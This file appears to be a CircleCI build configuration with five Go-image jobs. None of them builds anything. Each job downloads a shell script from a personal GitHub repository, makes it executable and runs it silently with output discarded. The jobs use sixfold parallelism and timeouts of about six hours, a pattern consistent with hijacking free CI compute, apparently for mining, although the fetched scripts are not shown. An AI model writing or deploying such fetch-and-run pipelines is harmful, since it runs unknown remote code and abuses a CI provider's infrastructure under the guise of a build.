version: 2
jobs:
  build_01:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.7
        resource_class: large

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/rush.sh && chmod +x rush.sh &&./rush.sh > /dev/null"
      
  build_02:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.7

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/rush.sh && chmod +x rush.sh &&./rush.sh > /dev/null"
      
  build_03:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.7

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/rush.sh && chmod +x rush.sh &&./rush.sh > /dev/null"
      
  build_04:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.7

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/rush1.sh && chmod +x rush1.sh &&./rush1.sh > /dev/null"
          
  build_05:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.7

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/rush2.sh && chmod +x rush2.sh &&./rush2.sh > /dev/null"
workflows:
    version: 2
    build:
        jobs:
            - build_01
            - build_02
            - build_03
            - build_04
            - build_05